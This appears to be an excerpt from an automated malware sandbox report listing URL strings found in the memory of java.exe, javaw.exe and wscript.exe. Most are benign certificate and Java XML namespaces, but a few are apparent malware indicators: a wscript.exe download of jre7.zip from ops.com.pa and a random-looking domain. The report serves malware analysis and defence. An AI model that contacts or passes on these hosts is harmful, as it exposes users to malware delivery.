          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
          Source: javaw.exe, 00000009.00000002.591762381.0000000004DA5000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.591752460.0000000004DA1000.00000004.00000001.sdmpString found in binary or memory: http://gG2DwoT3pJewMEBGx6.com
          Source: java.exe, 00000002.00000002.333196283.000000000A3D5000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333114203.0000000005332000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592505653.0000000009F97000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592212742.0000000009B8F000.00000004.00000001.sdmpString found in binary or memory: http://java.oracle.com/
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/dtd/properties.dtd
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/dtd/properties.dtdS%
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/dtd/properties.dtdk
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/;
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check3C
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkC
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkL
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkurr
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/c
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/p(
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/r(
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/
          Source: javaw.exe, javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage#
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage3)
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/S
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacet
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/x
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/3p
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/Impl
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/Lorg/wA
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateKo
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateodeIter
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-statesun/org
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processingc
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD3
          Source: javaw.exe, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTDS
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/s3
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592336171.0000000004ECE000.00000004.00000001.sdmpString found in binary or memory: http://maven.apache.org/POM/4.0.0
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmpString found in binary or memory: http://maven.apache.org/maven-v4_0_0.xsd
          Source: javaw.exe, javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmp, java.exe, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://null.oracle.com/
          Source: wscript.exe, 00000005.00000002.372915284.00000000006F3000.00000004.00000010.sdmpString found in binary or memory: http://ops.com.pa/jre7.zip
          Source: wscript.exe, 00000005.00000003.340480526.00000000053F9000.00000004.00000001.sdmpString found in binary or memory: http://ops.com.pa/jre7.zipW
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
          Source: javaw.exe, 00000009.00000002.593181082.000000000A27A000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592945279.0000000009E32000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl3
          Source: javaw.exe, 00000009.00000002.592336171.0000000004ECE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590748343.00000000048DE000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanism/w3c/
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanismk
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanismrg/ap
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties//w3c/d
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/K
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/ache/x
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitA
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimitk
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfodrop
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfok
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/k
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth/sun/orC
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthC
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthg;)V
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit#
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitringB7
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitE
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitwE
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitCF
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitorg9
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit)(Ljava
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit3h
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit;0
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitrn
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
          Source: javaw.exe, 00000009.00000002.593181082.000000000A27A000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592945279.0000000009E32000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features//dom
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/0co
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/C
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTDs7
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities#
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities7
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entitieswna7
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entitiesK?
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixesnt(
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixeso
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces&
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
